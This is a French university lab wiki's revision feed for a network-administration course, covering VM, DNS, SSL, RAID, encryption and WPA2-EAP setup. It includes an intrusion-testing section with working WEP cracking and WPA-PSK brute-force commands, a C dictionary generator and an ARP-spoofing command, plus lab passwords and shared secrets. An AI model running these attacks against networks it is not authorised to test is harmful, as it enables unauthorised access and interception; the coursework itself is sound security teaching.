&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;br /&gt;
&lt;br /&gt;
commande installation python :&lt;br /&gt;
 ansible -i clavaire.ini -m raw -a &amp;quot;apt install python -y&amp;quot; all --user root --ask-pass&lt;br /&gt;
&lt;br /&gt;
commande envoi clé ssh :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key=&amp;quot;{{lookup(&amp;quot;file&amp;quot;,&amp;quot;/root/.ssh/id_rsa.pub&amp;quot;)}}&amp;quot;' --user root --ask-pass all&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dockerfile&lt;br /&gt;
&lt;br /&gt;
 FROM httpd&lt;br /&gt;
 COPY ./index.html /usr/local/apache2/htdocs/&lt;br /&gt;
 CMD [ &amp;quot;httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot; ]&lt;br /&gt;
&lt;br /&gt;
 docker build -t web .&lt;br /&gt;
&lt;br /&gt;
 docker run -d web&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54806</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54806"/>
				<updated>2020-12-17T10:34:22Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;br /&gt;
&lt;br /&gt;
commande installation python :&lt;br /&gt;
 ansible -i clavaire.ini -m raw -a &amp;quot;apt install python -y&amp;quot; all --user root --ask-pass&lt;br /&gt;
&lt;br /&gt;
commande envoi clé ssh :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key=&amp;quot;{{lookup(&amp;quot;file&amp;quot;,&amp;quot;/root/.ssh/id_rsa.pub&amp;quot;)}}&amp;quot;' --user root --ask-pass all&amp;lt;/nowiki&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54805</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54805"/>
				<updated>2020-12-17T10:30:16Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
